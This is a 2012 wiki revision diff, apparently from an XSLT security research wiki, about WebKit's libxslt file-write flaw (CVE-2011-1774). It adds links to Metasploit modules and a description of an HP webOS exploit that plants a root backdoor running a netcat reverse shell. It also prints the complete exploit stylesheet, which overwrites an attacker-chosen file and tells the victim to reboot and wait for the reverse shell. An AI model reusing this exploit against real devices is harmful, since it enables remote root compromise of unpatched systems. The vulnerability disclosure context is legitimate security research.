Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48

From version Icon 3.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 21:59
Change comment: There is no comment for this version
To version Icon 5.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 23:57
Change comment: Upload new attachment webos-root-backdoor.xsl

Summary

Details

Icon Page properties
Content
... ... @@ -26,4 +26,16 @@
26 26  Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
27 27  
28 28  
29 -PoC included on the [[libxslt>>Engine_libxslt]] page are enough to demonstrate the vulnerability. A auxiliary plugin is available in Metasploit
29 +PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30 +
31 +== Exploits ==
32 +
33 +Two modules are included in Metasploit :
34 +
35 +* a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
36 +* an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
37 +
38 +An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
39 +
40 +* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
41 +* XSL reads the XML file and create the requested file on disk
Icon webos-root-backdoor.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +816 bytes
Content
... ... @@ -1,0 +1,17 @@
1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 + <!-- Of course, the webOS browser runs as 'root' ;-) -->
3 + <xsl:template match="/">
4 + <!-- Grab some values from the XML file -->
5 + <xsl:variable name="content" select="//content/text()"/>
6 + <xsl:variable name="location" select="//location/text()"/>
7 + <html><body>
8 + <!-- Drop the backdoor, overwriting the previous configuration file -->
9 + <xsl:document href="{$location}" method="text"><xsl:copy-of select="$content"/></xsl:document>
10 + <!-- Display something to the user -->
11 + File '<xsl:copy-of select="$location"/>' has been overwritten ...<br/>
12 + <!-- Ask for a reboot. We could force it too ... -->
13 + Now reboot and wait for your reverse-shell ;-)<br/>
14 + </body></html>
15 + </xsl:template>
16 +</xsl:stylesheet>
17 +